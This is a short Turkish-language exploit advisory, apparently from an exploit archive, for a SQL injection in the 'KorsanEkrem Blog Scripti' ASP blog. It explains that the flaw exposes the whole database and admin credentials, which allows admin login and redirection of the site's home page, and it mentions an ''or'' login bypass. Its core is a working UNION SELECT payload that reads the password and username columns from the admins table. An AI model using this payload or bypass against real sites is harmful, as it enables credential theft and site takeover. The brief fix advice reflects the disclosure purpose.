< ------------------- header data start ------------------- >

#############################################################

# Application Name : KorsanEkrem Blog Scripti

# Vulnerable Type : SQL Injection

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : Formdan gelen verileri db ye iletirken zararli karakterleri temizleyen filitreleme kullanilmali. func.asp de sadece ’ (tektirnak) için bir fonksiyon yazlilmis ama ne hikmetse kendi sitesinden ’or’ ile admin girisi oluyor.


# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

+union+select+0,sifre,2,3,4,5,kadi,7+from+admins

< -- bug code end of -- >